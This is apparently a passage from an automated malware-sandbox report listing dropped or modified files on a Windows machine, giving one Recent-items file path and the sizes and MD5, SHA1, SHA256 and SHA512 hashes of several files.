SHA512 c1847a1521ef84220664528d38fa67cec22a8a60fe1bbdcb5ba8a8a0b6b8eb1ec9053ea3f3153bde85843eb65594322bbd3e3536f489b2ccfada567b5d2e72a3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 f063cd82a5147aba5c37d9be76e4a9af
SHA1 ccf8398b4747ca38ad6f2ddc3fc1c5fdf7d098da
SHA256 5301902d6590fdad269cf11fda583fbdf7950ce63a24664beb70d2bb06a478f2
SHA512 c3f85a799d40fc57950e72c26b9da3cb39cf779f82b0a594128e3d8c066a2e88d14f1ee68358c26c7cab058ead90223806d15690bfb5ab1fd19ab8af78e45df1

Filesize 6.2MB (the report lists this file 5 times)
MD5 c0ae6bec4cebe56140bf50f55b43aa20
SHA1 984af804846a402f79c7d5bd3261af41345acc89
SHA256 7243c1df7f0a3cd8f6e76694a086563ec204a8ea6dbc0f8c27b47dcc5051a9f8
SHA512 fba6dae59734f294dde042717d43e779e978a921ab959a055e201318f5706f4d7443b3177929d2a9b68fa046be2833cea001d073d75cc8d1e7f7e0218b89a7f2

Filesize 8KB
MD5 211722da90b5090db040b0522e2efdb3
SHA1 872f85cee8f3edd0f793c67635d51f234887b755
SHA256 9e0b501e424e498d1e2333315389856490ca6706ee33762cb0a0ed2856fc38c8
SHA512 08e65f6037604305cbe5c09ab2231330b6b28d271712bfe6434474872e2b641f396a38a48bff5ae8d3fa94754a080fbb800d5bab9ac270024cd689934229dbb3

Filesize 4KB
MD5 3a630e8a8bcf78f844da28f07bb91a37
SHA1 aa5f94161237666561ca1660f83ea461c827d5b1
SHA256 e3b6ae6f1fee08ee9822820473a77c30800e3ede01e0aed29f79363bfea809d8
SHA512 f67aa1ca30243bf4c87b41663120f041fd73d5125f255e79bb2c6717b8871d582c7861ba52420111bb5cf6d9804236bb373af2870bb3c94ce0a8fa70ebcd71ba

Filesize 268B
MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732